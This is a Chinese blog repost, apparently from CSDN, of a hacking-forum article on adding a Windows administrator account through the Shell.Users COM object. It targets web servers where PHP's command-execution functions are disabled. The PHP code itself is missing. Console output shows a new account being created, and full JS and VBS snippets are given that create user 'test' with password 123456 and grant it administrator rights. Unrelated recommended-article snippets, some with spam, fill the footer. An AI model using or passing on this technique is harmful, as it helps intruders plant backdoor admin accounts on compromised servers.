php 版shell.users 加管理员帐号方法

最新推荐文章于 2024-07-18 19:12:46 发布
最新推荐文章于 2024-07-18 19:12:46 发布
阅读量2.5k 收藏
点赞数
分类专栏: Perl/Python 文章标签: php exception 代码分析 lighttpd vmware 服务器

信息来源:邪恶八进制信息安全团队(www.eviloctal.com
议题作者:CyberH4ck[南拳Daddy]
Author: 南拳Daddy 转载请注明出处 hi.baidu.com/南拳daddy

09年的时候 LCX 写出了 js版 和vbs 版的shell.users 加管理员帐号的方法,后来我就想把它改成PHP 版,

由于对代码分析得不够准确,所以到最近才写出来,当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen

以及wscript.shell 组建被禁用的情况下,这也许是一个机会。

代码如下:

 

结果:

 

E:/program/PHPnow-1.5.6/php-5.2.14-Win32>php 1.php
<div align=center><b>PHP 版Shell.Users加管理员帐号</b></div>
Fatal error: Uncaught exception 'com_exception' with message 'Source: Unknown
Description: Unknown' in E:/program/PHPnow-1.5.6/php-5.2.14-Win32/1.php:6
Stack trace:
#0 E:/program/PHPnow-1.5.6/php-5.2.14-Win32/1.php(6): com->create('isosky.test'

#1 {main}
  thrown in E:/program/PHPnow-1.5.6/php-5.2.14-Win32/1.php on line 6

E:/program/PHPnow-1.5.6/php-5.2.14-Win32>net user

User accounts for //ISOSKY-PC

-------------------------------------------------------------------------------
__vmware_user__          Administrator            Guest
HelpAssistant            isosky                   isosky.test
SUPPORT_388945a0
The command completed successfully.


E:/program/PHPnow-1.5.6/php-5.2.14-Win32>

 

 

 

对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。

下面是 LCX 的代码

js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;


vbs:
Set  o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3

isosky
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPhp学习笔记——管理员添加
iheyu(一个新手小白女PHP初学者)
06-21 706
//==========修改管理员列表地址==========↓ D:\phpStudy\WWW\niwo\application\admin\view\common\left.html 原内容 &lt;li&gt; &lt;a href="/admin/document/index.html"&gt; ...
添加管理员信息php代码m,管理员添加、编辑功能代码
weixin_35363322的博客
03-10 429
摘要:控制器代码
PHP 代码审计之添加管理员
发哥微课堂
09-02 445
0x00:前言 cms 注册用户时,存在添加管理员漏洞,记录如下。 0x01:代码追踪 首先,前台注册普通账号时,url 地址为 / user/regin.php,打开 regin.php 发现,刚开始是接收注册数据,并进行一些校验,代码如下: if(!check::CheckUser($_POST['user_name'])) { check::AlertExit("输入的用户...
php实现管理员登录功能
weixin_33933118的博客
10-15 5798
2019独角兽企业重金招聘Python工程师标准>>> ...
[thinkPHP5项目实战_21]管理员添加、删除和修改
骑着代码去流浪
10-29 5803
与之前的业务一样,管理员添加和删除代码如下: 1.新建admin的控制器、视图和验证器文件: 2.控制器代码: <?php namespace app\admin\controller; use think\Controller; class Admin extends Controller { public function lists() { $
php用户管理拿shell,phpshell.users管理员帐号方法
weixin_36070568的博客
03-12 94
议题作者:CyberH4ck[南拳Daddy]Author: 南拳Daddy 转载请注明出处 hi.baidu.com/南拳daddy09年的时候 LCX 写出了 js 和vbs shell.users 管理员帐号方法,后来我就想把它改成PHP ,由于对代码分析得不够准确,所以到最近才写出来,当 php执行命令的函数如exec,system,shell_exec,proc_open,p...
php用户管理拿shell,php shell.users 管理员帐号方法
weixin_35975406的博客
03-12 64
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
美萍管理软件MSSHELL.DLL文件
03-30
【美萍管理软件MSSHELL.DLL文件】是美萍公司开发的一款管理软件的重要组件,主要功能在于提供软件界面的交互以及部分核心功能的支持。MSSHELL.DLL 文件是动态链接库(Dynamic Link Library)文件,这类文件在Windows...
php和asp利用Shell.Application来执行程序的代码
10-30
关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法
vs_shell.msi
06-17
VS2010 winform程序打包时,弹出窗口提示需要安装程序包vs_shell.msi的安装路径,特提取了vs_shell.msi和vs_shell.cab,方便网友。vs_shell.cab另外上传。
vbs 中调用shell.application 简单函数
09-06
这个对象是Windows Shell对象的一部分,提供了丰富的功能,例如运行程序、管理文件、控制窗口布局等。本文将深入探讨如何使用VBScript中的`Shell.Application`对象以及它的一些主要函数。 首先,我们需要创建`Shell...
php调用shell方法
01-20
本文实例讲述了php调用shell方法,分享给大家供大家参考。具体方法如下: 一、配置 查看php.ini中配置是否打开安全模式,主要是以下三个地方 safe_mode = (这个如果为off下面两个就不用管了) disable_functions =...
华为HCIP Datacom H12-821 卷42
QIN_yuexiang的博客
07-17 332
转换的第一步将FFFE插入MAC地址的公司标识和扩展标识符之间,第二步将从高位数,第7位的0改为1,1改为0。这种由MAC地址产生IPv6地址接口标识的方法可以减少配置的工作量,尤其是当采用无状态地址自动配置时,只需要获取一个IPv6前缀就可以与接口标识形成IPv6地址。已知某接口的MAC地址为OA-04-3B-45-1A-03,那么根据IEEE EUI-64规范生成的接口ID标识为:___-___-___-___-___-___-1A-03。数据链路层——ARP欺骗 网络层—Smurf攻击;
全新UI自助图文打印系统小程序源码/自助打印机前后端源码
12年全栈程序开发
07-17 295
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1305
Blade是Laravel的内置模板引擎,它让你的前端代码简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码
深入理解Linux网络(一):内核如何接收网络包
最新发布
又见南风的博客
07-18 812
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1045
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17
如何轻松将Squarespace网站迁移到WordPress
web_geek的博客
07-18 888
但是它也有一些缺点,Squarespace是一个封闭系统的CMS,对于初学者来说它是一个非常不错的一体化建站方案,但是随着网站的发展,用户的选择也会随之受限,例如,无法选择服务器提供商,也无法使用一些第三方的工具,相对于WordPress这种开源程序来说,局限性比较大,当您有了一定的网站运营基础或者想要更自由的对网站添加自己的设计元素的时候,WordPress就会成为更好的选择。但是,正如开头所说,会有部分内容无法直接转移过来,例如,你可能会在之前有音频或产品模块的位置看到空白或错误信息。
shell.executeStatement和shell.execute有什么区别
06-06
`shell.execute` 和 `shell.executeStatement` 都是在 Shell 中执行命令的函数,但它们的用途和参数不同。 `shell.execute` 是一个 JavaScript 函数,用于在 Shell 中执行命令。它的语法如下: ``` shell.execute(command, args, options); ``` 其中 `command` 是要执行的命令, `args` 是命令的参数, `options` 是一些选项(例如,指定当前工作目录、是否等待命令完成等)。 `shell.executeStatement` 是一个 SQL 函数,用于在 Shell 中执行 SQL 语句。它的语法如下: ``` shell.executeStatement(sql, options); ``` 其中 `sql` 是要执行的 SQL 语句, `options` 是一些选项(例如,指定当前数据库、是否显示结果等)。 因此,这两个函数的区别在于它们执行的命令是不同的, `shell.execute` 执行的是操作系统命令,而 `shell.executeStatement` 执行的是 SQL 语句。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值